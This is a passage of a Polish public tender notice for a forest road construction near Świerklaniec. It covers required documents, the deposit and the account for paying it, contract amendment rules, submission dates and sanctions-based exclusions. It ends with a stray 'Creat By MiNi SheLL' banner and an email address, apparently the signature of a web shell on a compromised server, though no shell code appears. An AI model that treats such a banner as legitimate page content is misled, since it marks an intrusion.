class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących<br/>podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>a) oświadczenie Wykonawcy o aktualności informacji zawartych we wstępnym<br/>oświadczeniu o niepodleganiu wykluczeniu w zakresie opisanym w niniejszej SWZ<br/>(załącznik nr 9). W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie składa każdy z Wykonawców. Oświadczenie składa się<br/>w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym. W przypadku oświadczenia<br/>sporządzonego w postaci papierowej i opatrzonego własnoręcznym podpisem,<br/>przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone podpisem<br/>kwalifikowanym, zaufanym bądź podpisem osobistym Wykonawcy. Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia, są odpowiedzialni w zakresie<br/>podmiotowych środków dowodowych w zakresie ich dotyczącym.<br/>b) Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/>wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy<br/>min. o wysokości 400 000,00 zł w okresie nie wcześniejszym niż 3 miesiące przed<br/>złożeniem oferty.<br/>c) Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną określoną przez Zamawiającego tj. 500 000,00 zł.<br/>d) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału<br/>w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz<br/>których roboty te zostały wykonane, z załączeniem dowodów określających czy te<br/>roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy<br/>roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane,<br/>a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest<br/>w stanie uzyskać tych dokumentów – inne dokumenty (załącznik nr 7).<br/>e) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (załącznik nr 6).<br/>f) Wykaz sprzętu, którym będzie dysponował wykonawca przy wykonywania<br/>zamówienia (Załączniki nr 8 do SWZ)<br/>g) kosztorys wykonany metodą kalkulacji szczegółowej zgodnie z powszechnie<br/>obowiązującymi zasadami kosztorysowania<br/>h) aktualne na dzień składania ofert oświadczenie w zakresie spełniania warunków udziału<br/>w postępowaniu (załącznik nr 3)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) oświadczenie Wykonawcy o aktualności informacji zawartych we wstępnym oświadczeniu o niepodleganiu wykluczeniu w<br/>zakresie opisanym w niniejszej<br/>SWZ (załącznik nr 9). W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa<br/>każdy z Wykonawców. Oświadczenie składa się w postaci elektronicznej i opatruje się kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku oświadczenia sporządzonego w postaci<br/>papierowej i opatrzonego własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone<br/>podpisem kwalifikowanym, zaufanym bądź podpisem osobistym Wykonawcy. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia, są odpowiedzialni w zakresie podmiotowych środków dowodowych w zakresie ich dotyczącym.<br/>b) Formularz ofertowy (załącznik nr 2 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 22 000,00 zł<br/>(słownie:dwadzieściadwatysiącezłotych00/100).<br/>Wadium musi obejmować cały okres związania ofertą.<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>-pieniądzu<br/>-gwarancji bankowej<br/>-gwarancji ubezpieczeniowej<br/>-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy<br/>z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(tj. Dz. U. 2025 poz. 98).<br/>a) Wadium wnoszone w pieniądzu wpłaca się na rachunek bankowy:<br/>Nadleśnictwo Świerklaniec<br/>BNP Paribas Bank Polska S.A. nr konta 39 1600 1462 1016 7762 7000 0004<br/>z dopiskiem „Wadium – budowa drogi Jędrysek” Wadium wniesione w pieniądzu powinno<br/>zostać uiszczone na rachunek bankowy Zamawiającego bezpośrednio z rachunku<br/>bankowego Wykonawcy. Za termin wniesienia wadium przyjmuje się datę uznania<br/>rachunku Zamawiającego.<br/>b) Wadium wnoszone w formie gwarancji lub poręczenia – Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w formie elektronicznej.<br/>Zwrot lub zatrzymanie wadium nastąpi zgodnie z zapisami art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 18 1.	Zm. postanowień umowy, pod rygorem nieważności takiej zm., może być dokonana przez obie strony w for. pisemnej, w drodze aneksu do umowy, z zastrzeż. sposobu zm. wskazanych poniżej, z wył. sposobu zm. określonych w ust. 2 pkt 1a, 1b i pkt 4. 2.	Przewidywane możliwości dokonania zm. w umowie w nast. zakresach: 1)	c. ofert.: a)	w przypadku ustawowej zm. stawki podatku Vat w czasie realizacji zam., o wlk. tej stawki – zm. nastąpić może na podstawie pisemnego zaw. Zam.; b)	w przypadku rezygnacji z cz. zamówienia wynikającej z zaistnienia okoliczności pow., że wyk. jej nie leży w interesie publicznym – zm. nastąpić może na podst. pisemnego zaw. Zam. Zam. uprawniony jest do rezygnacji ze zlecenia realizacji czę. zam., jednak nie więcej niż o 20% przed. umowy, co nie kreuje po stronie Wyk. żadnych roszczeń względem Zam.; c)	w przypadku rezygnacji z wyk. pewnych robót przewidzianych w przeprowadzonym post. tzw. robót zaniechanych. 2)	ter. wyk. przed. umowy:<br/>a)	w przypadku wstrzymania robót bud. w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia; b)	w przypadku zaistnienia okoliczności niezależnych od Wyk., a w szczególności w przypadku istotnych błędów w dok.proj., kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych, aktualizacji rozwiązań z uwagi na postęp technologiczny, zawieszenia przez Zamawiającego wykonania robót, wyjątkowo niekorzystnych warunków klimatycznych (gdy wystąpią niekorzystne warunki atm. uniemożliwiające przez okres co najmniej 10-u dni kal. prawidłową realizację robót określonych w umowie (np. długotrwałe opady deszczu pow. powódź lub podtopienia na placu bud., przemoczenie gruntu i mat. uniemożliwiające realizację prac, długotrwale opady śniegu, długotrwałe niskie lub wysokie temp., silne wiatry sięgające w porywach pow. 30m/s, trąba pow., huragan, trzęsienie ziemi lub inne anormalne warunki atm.), w szczególności ze wzg. na technologię ich wykonania przy zapewnieniu odpowiednich warunków atm. zgodnie z przyjętymi normami lub przepisami prawnymi, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem). w powyższych przypadkach nowy termin wykonania zamówienia ustali Zam. w porozumieniu z Wyk. uwzględniając zaistniałe okoliczności 3)	sposobu realizacji zam. wynikającej ze zm. w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację umowy; 4)	zm. przedmiotu umowy w sytuacji wystąpienia w trakcie realizacji przedmiotu umowy konieczności wyk. robót zamiennych w stosunku do przewidzianych w postępowaniu;<br/>5)	zm. osób wyznaczonych przez Zam. i Wyk. do nadzorowania i kontaktów roboczych w trakcie realizacji – osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zam. mogą być zmienione zarówno przez Zam. i Wyk. Jeśli osoby te winny spełniać określone wymagania to strony to potwierdzą w sposób przewidziany w SWZ. Jeżeli osoby te nie muszą spełniać określonych wymagań to ich zm. może nastąpić po uprzednim pisemnym, skutecznym zaw. strony przeciwnej. Powyższa zm. będzie wymagała pisemnego poinformowania i zgody Zam.<br/>6)	Zam. dopuszcza zmianę Podwykonawców - podmiotów trzecich, na zasobach których Wyk. opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że kolejny Podwykonawca wykaże spełnianie warunków w zakresie wymaganym przez Zam. na etapie postępowania o zam. publiczne.<br/>3. Określa się następujący tryb dokonywania zm. postanowień umowy:<br/>Sposób inicjowania zmian: a.	Zam.: wnioskuje pisemnie do Wyk. w sprawie możliwości dokonania wskazanej zm. b.	Wyk.: wnioskuje pisemnie do Zam. w sprawie możliwości dokonania wskazanej zm.<br/>Przyczyny dokonania zm. postanowień umowy oraz uzasadnienie takich zm. należy opisać w stosownych dok. - notatka służbowa, pismo Wyk., protokół konieczności, itp. 4. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy JOSEPHINE https://josephine.proebiz.com/pl/w sposób opisany powyżej</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) Cena ofertowa (C)<br/>2) Okres gwarancji (G) <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy Wykonawcę z postępowania na podstawie art. 7 ust. 1 ustawy dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego<br/>(t.j. Dz. U. z 2025 r. poz. 514):<br/>a) wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu<br/>269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o<br/>którym mowa w art. 1 pkt 3 ustawy<br/>b) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t.j. Dz. U. 2023 poz. 1124 z późn.zm.) jest osoba<br/>wymieniona w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/>ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ustawy<br/>c) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (t.j.<br/>Dz. U. z 2023 poz. 120 z późn.zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej<br/>o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy<br/>Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/ spółki<br/>cywilne):<br/>a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia,<br/>b) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy,<br/>a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji wystawione zgodnie<br/>z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców występujących<br/>wspólnie należy załączyć do oferty,<br/>c) Oferta winna być podpisana przez każdego z Wykonawców występujących wspólnie lub przez upoważnionego<br/>przedstawiciela,<br/>d) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy,<br/>e) Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona<br/>w prowadzonym postępowaniu jako najkorzystniejsza przed zawarciem umowy Zamawiający zażąda w wyznaczonym<br/>terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich Wykonawców, przy czym<br/>termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia.<br/>Szczegółowy opis kryteriów i sposobu oceny oferty znajdują sie w pkt. XVII SWZ<br/>Informacja o środkach ochrony prawnej znajduje sie w pkt XX SWZ<br/>Informacje o formalności jakie powinny zostać dopełnione po wyborze ofert w celu zawarcia umowy znajdują sie w pkt. XVIII<br/>SWZ<br/>Szczegółowe informacje o zabezpieczeniu należytego wykonania umowy znajdują sie w X SWZ (strona 15-17 SWZ)<br/>Zamawiający informuje, że niniejsze zamówienie będzie realizowane na podstawie decyzji o pozwolenia na budowę. Postępowanie w sprawie wydania ww. decyzji jest w toku.<br/>W przypadku nie otrzymania decyzji postępowanie zostanie unieważnione.

Creat By MiNi SheLL
Email: jattceo@gmail.com